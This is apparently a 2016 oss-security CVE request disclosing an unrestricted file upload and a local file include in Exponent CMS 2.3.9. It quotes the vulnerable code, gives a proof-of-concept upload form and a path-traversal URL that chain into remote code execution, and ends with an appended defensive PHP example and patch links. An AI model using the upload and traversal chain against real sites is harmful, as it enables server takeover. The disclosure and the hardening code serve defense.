Date: Wed, 21 Sep 2016 10:08:21 +0800
From: "DM_" <contact@...ay.me>
To: "oss-security" <oss-security@...ts.openwall.com>
Subject: CVE request: Exponent CMS 2.3.9 Unrestricted File Upload RCE and Local File Include vulnerability

Hi,


This is YongXiao Ma of Silence's PKAV Team. I reported some security issues to ExponentCMS some days ago. 


# Test environment
exponent version: latest 2.3.9
php: 5.5.x
server: apache 2.2.x


# Details


1. Unrestricted File Upload
There is an unrestricted file upload issue at framework/modules/forms/controllers/formsController.php, and the uploaded file is placed in /tmp/, where PHP scripts can be executed.


Although we don't know the file name, we can brute-force it simply, as it is time() + "_" + upload name.


    public function import_csv_mapper() {
        //Check to make sure the user filled out the required input.
        if (!is_numeric($this->params["rowstart"])) {
            unset($this->params["rowstart"]);
            $this->params['_formError'] = gt('The starting row must be a number.');
            expSession::set("last_POST", $this->params);
            header("Location: " . $_SERVER['HTTP_REFERER']);
            exit('Redirecting...');
        }


        if (!empty($this->params['forms_id'])) {
            // if we are importing to an existing form, jump to that step
            $this->import_csv_data_mapper();
        } else {
            //Get the temp directory to put the uploaded file
            $directory = "tmp";


            //Get the file save it to the temp directory
            if ($_FILES["upload"]["error"] == UPLOAD_ERR_OK) {
                //	$file = file::update("upload",$directory,null,time()."_".$_FILES['upload']['name']);
                $file = expFile::fileUpload("upload", false, false, time() . "_" . $_FILES['upload']['name'], $directory.'/'); //FIXME quick hack to remove file model
	....


POC: 


	<!DOCTYPE html>
	<html>
	<form action="http://localhost/exponent-2.3.9/index.php?controller=forms&action=import_csv_mapper&forms_id=1&rowstart=0" method="POST" enctype="multipart/form-data">
	<input type="file" name="upload">
	<input type="submit" name="submit">
	</form>
	</html>


2. LFI


Then the LFI comes, at exponent-2.3.9/install/popup.php.


    <?php
    $page = (isset($_REQUEST['page']) ? expString::sanitize($_REQUEST['page']) : '');
    if (is_readable('popups/' . $page . '.php')) {
        include('popups/' . $page . '.php');
    }
    ?>


So we can upload a PHP file, then include it to achieve RCE again.


POC: 
	http://127.0.0.1/exponent-2.3.9/install/popup.php?page=../../files/test




# Patches


https://exponentcms.lighthouseapp.com/projects/61783/changesets/355702a9835cf527796c9d469a82258b7639148a
https://exponentcms.lighthouseapp.com/projects/61783/changesets/628ea61834d92611644a1dfc1ba24216ee647c59
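As an added example for readers of this report (not code from the report or from Exponent CMS, and not a reproduction of the vendor's patches linked above), the two quoted patterns can be closed on the application side as follows: the popup include resolves the requested name inside a fixed directory and refuses anything that escapes it, and the CSV upload ignores the client-supplied file name, checks the content type, and stores the file under a random name in a directory the web server does not execute scripts from. The function names, the storage directory and the allowed MIME types are assumptions for illustration.

```php
<?php
// Added example, not Exponent's code. Defensive versions of the two patterns
// quoted in the report; names and paths are illustrative assumptions.

// 1. Safe include for install/popup.php: only a plain identifier is accepted,
//    and the resolved file must live inside $popupDir (defense in depth).
function safe_popup_path(string $page, string $popupDir): ?string
{
    // Identifier allowlist: no slashes, dots or null bytes can pass this.
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $page)) {
        return null;
    }
    $base = realpath($popupDir);
    $candidate = realpath($popupDir . '/' . $page . '.php');
    if ($base === false || $candidate === false) {
        return null; // directory missing or page does not exist
    }
    // Containment check: the canonical path must start with the base dir.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// 2. Safe handling of the CSV import upload. $storageDir is assumed to be
//    outside the document root, or served with PHP execution disabled
//    (e.g. "php_flag engine off" in Apache), so nothing stored there runs.
function store_csv_upload(array $file, string $storageDir): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    // Reject anything that was not uploaded in this request.
    if (!is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Decide on content, never on the client-supplied name or MIME type.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = $finfo->file($file['tmp_name']);
    if (!in_array($mime, ['text/plain', 'text/csv'], true)) {
        return null; // a PHP script is detected as text/x-php and rejected
    }
    // Random name with a fixed extension; the original name never reaches disk,
    // so it cannot be guessed from time() and cannot carry a .php suffix.
    $target = rtrim($storageDir, '/') . '/' . bin2hex(random_bytes(16)) . '.csv';
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return null;
    }
    chmod($target, 0640);
    return $target;
}

// Usage in the two call sites (illustrative):
//   $path = safe_popup_path($_REQUEST['page'] ?? '', __DIR__ . '/popups');
//   if ($path !== null) { include $path; }
//
//   $stored = store_csv_upload($_FILES['upload'] ?? [], '/var/lib/exponent/uploads');
//   if ($stored === null) { /* report an invalid upload, do not redirect to HTTP_REFERER */ }
```

With the identifier allowlist in place, the LFI request in the report (`page=../../files/test`) is rejected before any filesystem call; the realpath containment check is kept so that a future relaxation of the pattern cannot silently reintroduce traversal. On the upload side, the random name removes the brute-forceable `time() . "_" . name` scheme the report relies on, and the content check plus a non-executing storage directory means that even a file that slips through cannot be executed by the web server.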
